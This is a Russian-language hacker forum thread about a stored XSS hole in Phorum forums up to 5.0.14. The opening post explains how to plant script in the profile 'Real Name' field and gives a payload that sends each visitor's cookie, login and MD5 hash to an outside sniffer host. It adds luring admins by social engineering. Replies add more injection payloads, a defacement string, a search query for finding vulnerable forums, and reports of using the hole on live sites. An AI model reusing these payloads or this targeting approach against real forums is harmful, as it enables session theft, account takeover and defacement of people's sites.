![]() |
XSS в Phorum<=5.0.14
CyberLords тима, обнаружила данную XSS в форумах Phorum до 5.0.14 версии.
Суть уязвимости в том что за регавшись на форуме, в контрольном меню можно ввести прозивольную XSS. А точнее заходим в раздел редактирования профиля My Profile-->Edit My Profile В поле Real Name вводим имя затем XSS, пример: Код:
Вовочка<script>alert(document.cookie)</script>Теперь как можно употребить на других, В поле Real Nаme вставим: Код:
Вовочка<script>img = new Image(); img.src = "http://site.com/снифер/сниф.jpg?"+document.cookie;</script>Теперь каждый юзверь при просмотре вашего профиля отсылает на лог снифера свой логин и хеш МД5. Вопрос как заманить нужную жертву (админ или модер) на ваш профиль...это дело соц. инженерии.:) Теперь, подделка куков, :( жаль не сработала, вчера пыхтел любыми путями, не получилось:( Может у кого другого получитса, дай знать:). Братец KEZ от снеми видео, еси такое дело с куками провернётса:) Просто этот форум времмено содержит куки, которые через некоторое время уничтажаютса, что требует повторной авторизации. |
Ну давай ссылку что нам гадать в чём проблема чтоли?
|
Хотя если честно, то Я проблему знаю. Мне просто ссылка нужна. Ссылку давай короче.
|
Цитата:
Цитата:
Цитата:
|
Если никто не против, на днях сделаю видео.
|
Никаких трабл ну! Ссылку давайте Я знаю в чём ваша ошибка.
|
Цитата:
|
Цитата:
ты о чем?? Цитата:
|
Ну и форум... Что это за форум на котором можно ставить <script>
|
Цитата:
эх, был бы выход куки подделать.. |
Цитата:
Беру свои слова назад, без просмотра жертвой профайла ничего не выйдет. Кстати, в phorume присутствуют bb теги, эт. так, для размышлений..... А насчет видео, в принципе всё и так понятно, но если есть потребность......будет и предложение. |
Цитата:
Вобщем сплошной ЛОЛ. |
В этом форуме есть ещё уязвимости xss
|
Давеча ковырялся в старенькой версии phorum, несмотря на старость её можно найти на просторах инета оч. легко, и наткнулся на такой баг. При анонимном ответе, в поле Your E-mail: вставляю
Код:
gates@microsoft.com"><script>alert('')</script>p.s. KEZ, где ты ещё нашел, не в bb ль тегах? |
Короче просто дайте мне ссылку на форум Я там хочу баги найти.
|
Morph"><script>alert('Morph Forever')</script> это еще в поле ник проходит =)
Тока я зайти не могу еще чтонить поищем )) |
А я письмо не получил ))
|
Все работает всем алерты раздал зашибись ))
Дыра Большая одна одним словом |
Млрф дай ссылку где ты это зделал.
|
в поисковике найди я так нашел и не запоминал
И Я не Млрф!!!!! :mad: :mad: :mad: |
Ну ты как икал? Дай точные слова в гуле которые ты встовлял.
|
KissMyASSBABY"><font color=red size=30>HACKED BY MORPH</font> Вот так тоже прикалыватся можно ))Везде проходит =))
|
http://www.google.com/search?q=Phoru...utf-8&oe=utf-8
На Жорик держи. |
| Время: 20:44 |